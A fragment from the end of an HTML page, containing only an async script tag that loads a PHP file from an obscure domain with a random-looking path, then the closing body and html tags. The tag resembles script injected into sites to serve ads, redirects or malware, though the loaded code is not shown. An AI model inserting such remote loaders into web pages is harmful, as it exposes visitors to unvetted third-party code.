<script async src="//dwbogv.com/8snl17291ivlm0p3y0hq8786uqv678kypxu1lk8.php"></script>

</body>
</html>
